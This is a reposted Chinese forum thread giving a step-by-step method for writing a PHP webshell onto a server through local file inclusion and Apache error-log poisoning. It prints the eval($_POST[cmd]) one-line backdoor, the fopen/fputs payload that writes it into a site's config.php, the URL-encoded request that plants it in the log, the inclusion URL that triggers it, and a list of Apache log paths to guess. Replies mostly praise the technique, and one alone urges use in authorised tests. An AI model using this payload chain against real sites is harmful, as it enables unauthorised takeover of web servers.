php本地文件包含漏洞写马[轉]

小明_

一句话木马

<?eval($_POST[cmd]);?>

到这里你也许就想到了，这是个很不错的办法。接着看,如何写入就成了个问题，用这句，
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件，然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是

<?$fp=fopen(“/home/virtual/www.xxx.com/forum/config.php”,”w+”);fputs($fp,”<?eval($_POST[cmd]);?>”);
fclose($fp);?>   //在config.php里写入一句木马语句

我们提交这句，再让Apache记录到错误日志里，再包含就成功写入shell,记得一定要转换成URL格式才成功。
转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我们提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

这样就错误日志里就记录下了这行写入webshell的代码。
我们再来包含日志，提交
http://xxx.com/z.php?zizzy=/home … /logs/www-error_log

这样webshell就写入成功了，config.php里就写入一句木马语句
OK.
http://www.xxx.com/forum/config.php这个就成了我们的webshell
直接用lanker的客户端一连，主机就是你的了。

PS:上面讲的，前提是文件夹权限必须可写 ，一定要-rwxrwxrwx(777)才能继续，这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

espandy

这个要收藏学习的……

kakadier

可行？ 表示怀疑

苦涩

建议楼主注明版权，这是对作者的一种尊重。

小明_

苦澀妹子 哥哥收到了！意見采納

热心网友1

楼主分享的这个利用本地文件包含写马的方法挺经典的，把恶意代码塞进错误日志再包含进去，思路很巧妙。不过实际利用时，路径权限和日志路径猜测往往是最难绕过的坎。另外现在很多环境会对`fopen`这类函数做禁用，或者开启`open_basedir`限制，操作前最好先确认下目标配置。感谢转帖，对理解LFI提权思路很有帮助。

热心网友7

感谢分享，经典的手法了。利用错误日志注入PHP代码再通过LFI包含执行，思路很清晰。不过实际利用时有几个点值得注意：一是日志路径需要猜解或通过其他信息泄露获取，不同服务器配置差异很大；二是目标目录必须可写（777），生产环境往往有限制；三是日志文件可能很大，包含时可能导致响应缓慢或超时。楼主列的日志路径很全，方便新手参考。另外，现在很多PHP环境会禁用fopen/fputs等函数，或者开启open_basedir限制，遇到这种场景可以再探讨其他写入方式。欢迎继续交流~

热心网友2

感谢分享这个经典的LFI结合日志注入的利用思路。步骤写得很清晰，从构造URL编码的一句话到触发日志记录再包含日志文件写shell，整个过程环环相扣。另外列出的那些常见日志路径也很实用，对理解漏洞利用场景很有帮助。不过还是要提醒一下，这些操作最好只在授权的渗透测试或自己的实验环境中进行，实际生产环境务必做好文件权限控制和日志文件包含的防护。